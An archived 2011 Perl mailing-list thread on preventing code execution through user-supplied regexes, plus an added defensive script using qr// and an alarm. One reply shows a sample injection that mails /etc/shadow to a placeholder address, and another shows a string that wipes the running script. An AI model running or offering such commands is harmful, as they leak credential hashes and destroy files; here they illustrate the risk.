regexp validation (arbitrary code execution) (regexp injection)
on 01.06.2011 23:25:39 by Stf
Suppose you have a collection of books, and want to provide your users
with the ability to search the book title, author or content using
regular expressions.
But you don't want to let them execute any code.
How would you validate/compile/evaluate the user provided regex so as to
provide maximum flexibility and prevent code execution?
--
Eisenbits - proven software solutions: http://www.eisenbits.com/
OpenPGP: E3D9 C030 88F5 D254 434C 6683 17DD 22A0 8A3B 5CC0
--
To unsubscribe, e-mail: beginners-unsubscribe@perl.org
For additional commands, e-mail: beginners-help@perl.org
http://learn.perl.org/
RE: regexp validation (arbitrary code execution) (regexp injection)
on 02.06.2011 14:27:03 by Bob McConnell
From: Stanislaw Findeisen
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?
You want them to run an application without having to run an
application? That doesn't make any sense.
You have several options available to give your users access to a
database.
1. Write a client application or applet they can copy or install on
their workstation to access the database directly.
2. Write a simpler application or applet that accesses a non-DB server
which in turn accesses the database.
3. Create a site on a web server they can access with a browser, which
then accesses the database.
There are any number of variations on these themes, but in each case,
they have to run some application code somewhere in order to access the
data.
Bob McConnell
Re: regexp validation (arbitrary code execution) (regexp injection)
on 02.06.2011 15:05:53 by Stf
On 2011-06-02 14:27, Bob McConnell wrote:
> From: Stanislaw Findeisen
>
>> Suppose you have a collection of books, and want to provide your users
>> with the ability to search the book title, author or content using
>> regular expressions.
>>
>> But you don't want to let them execute any code.
>>
>> How would you validate/compile/evaluate the user provided regex so as to
>> provide maximum flexibility and prevent code execution?
>
> You want them to run an application without having to run an
> application? That doesn't make any sense.
This is a complete misunderstanding. Sorry, perhaps I wasn't clear enough.
I was talking about users injecting *their* code via the regex. See for
instance:
http://perldoc.perl.org/perlretut.html#A-bit-of-magic:-executing-Perl-code-in-a-regular-expression
or /e modifier for the built-in function s (search and replace).
When doing:
$string =~ $regex
where $regex is a user-provided, arbitrary regular expression, anything
can happen.
--
Eisenbits - proven software solutions: http://www.eisenbits.com/
OpenPGP: E3D9 C030 88F5 D254 434C 6683 17DD 22A0 8A3B 5CC0
Re: regexp validation (arbitrary code execution) (regexp injection)
on 02.06.2011 15:13:15 by Rob Coops
2011/6/1 Stanisław Findeisen
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?
Hi Stanisław,
From what you are saying I think you are looking for an option to take a
string and check it for any potential bad characters that would cause the
system to execute unwanted code.
So a bit like this: "In.*?forest$" is a safe string to feed into your
regular expression but: ".*/; open my $fh, ">", $0; close $fh; $_ = ~/" is
an evil string causing you a lot of grief. At least that is how I understand
your question...
To be honest I am not sure if this is an issue, as I suspect that the
following construction:
if ( $title =~ m/$userinput/ ) { do stuff... }
will give you any issues; as far as I can remember the variable that you are
feeding here will not be treated as code by the interpreter but simply as
matching instructions, which would mean that whatever your user throws at it
perl will in the worst case return a failure to match.
But please don't take my word for it, try it in a very simple test and see
what happens.
If you do have to ensure that a user cannot execute any code you could
simply prevent the user from entering the ; or, smarter yet, filter this out
from the user input, to prevent a "smart" user from feeding it to your code
via a method other than the front-end you provided. Without a means to
close the previous regular expression the user cannot really insert
executable code into your regular expression. At least that's what I would
try, but I am by no means an expert in the area and I suspect there might be
some people reading this and wondering why I didn't think of A, B or C; if so
please do speak up people ;-)
Regards,
Rob
Re: regexp validation (arbitrary code execution) (regexp injection)
on 02.06.2011 15:36:28 by merlyn
>>>>> "Stanisław" == Stanisław Findeisen writes:
Stanisław> But you don't want to let them execute any code.
Unless "use re 'eval'" is in scope, /$a/ is safe even if $a came from an
untrusted source, as long as you limit the run-time to a few seconds or
so with an alarm. (Some regex can take nearly forever to fail.)
See "perldoc perlre" for more details.
--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
Smalltalk/Perl/Unix consulting, Technical writing, Comedy, etc. etc.
See http://methodsandmessages.posterous.com/ for Smalltalk discussion
Re: regexp validation (arbitrary code execution) (regexp injection)
on 02.06.2011 15:50:45 by Paul Johnson
On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?
In general this shouldn't be a problem provided you don't turn on
use re "eval";
$ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print
"hello" })/ at -e line 1.
$ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'
hello
Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:
$ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com < /etc/shadow" })'
Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.
If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum
flexibility.
--
Paul Johnson - paul@pjcj.net
http://www.pjcj.net
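The following script is an added example and is not code from the thread or from any of its posters. It puts Randal's and Paul's advice into one place: compile the untrusted pattern with qr// while `use re 'eval'` is not in scope, so a pattern carrying (?{ ... }) is rejected at compile time rather than run; never build the match through a string eval; and bound the match with an alarm as a backstop against patterns that backtrack for a very long time. The helper names (compile_untrusted_regex, search_with_timeout), the book titles and the three sample inputs are all constructed for this example; it assumes Perl 5.10 or later for the `//=` operator.

```perl
#!/usr/bin/perl
# Added example, not from the thread. Assumes Perl 5.10+ and that
# `use re 'eval'` is NOT enabled anywhere in scope.
use strict;
use warnings;

# Compile an untrusted pattern with qr//. Without `use re 'eval'` in scope,
# a pattern interpolated from a variable may not contain (?{ ... }) or
# (??{ ... }): qr// dies with "Eval-group not allowed at runtime". It also
# dies on ordinary syntax errors. Both are caught here and reported, so the
# caller never sees a half-compiled pattern.
sub compile_untrusted_regex {
    my ($pattern) = @_;
    my $re = eval { qr/$pattern/ };
    return (undef, $@) unless defined $re;
    return ($re, undef);
}

# Match a compiled pattern against a list, bounded by an alarm so a pattern
# that backtracks for a very long time is cut off instead of tying up the
# process. Caveat: under Perl's default "safe signals" SIGALRM is only acted
# on between opcodes, so one pathological match on a very large string may
# still run to completion before the die fires; keep per-item inputs small
# as well and treat the alarm as a backstop, not the only limit.
sub search_with_timeout {
    my ($re, $items, $seconds) = @_;
    $seconds //= 2;
    my @hits;
    my $ok = eval {
        local $SIG{ALRM} = sub { die "regex timed out\n" };
        alarm $seconds;
        @hits = grep { $_ =~ $re } @$items;   # plain match, no string eval
        alarm 0;
        1;
    };
    alarm 0;    # make sure no alarm is left pending on the error path
    return $ok ? (\@hits, undef) : (undef, $@);
}

# Constructed sample data (not real book titles from anywhere).
my @titles = ("In the forest", "Into the Wild", "The Art of Perl");

# Constructed inputs: a benign search, an injection attempt of the kind
# shown in the thread, and a pattern whose nested quantifiers backtrack
# exponentially on long non-matching input. The titles here are short, so
# the third one finishes quickly; on a real corpus the alarm is the backstop.
my @inputs = (
    'In.*?forest$',
    '(?{ print "injected\n" })',
    '^(a+)+$',
);

for my $input (@inputs) {
    my ($re, $err) = compile_untrusted_regex($input);
    if (!defined $re) {
        print "rejected [$input]: $err";      # qr// error text ends in "\n"
        next;
    }
    my ($hits, $merr) = search_with_timeout($re, \@titles, 2);
    if (!defined $hits) {
        print "aborted  [$input]: $merr";
        next;
    }
    print "matched  [$input]: ", join(", ", @$hits), "\n";
}
```

Run it as `perl safe_regex.pl` (any file name will do). The first input matches "In the forest", the second is rejected by qr// before anything inside the code block can run, and the third goes through the timed match path. If a later change ever adds `use re 'eval'` to this file, the second input would start executing, which is exactly why the compile step and the search step keep no such pragma in scope.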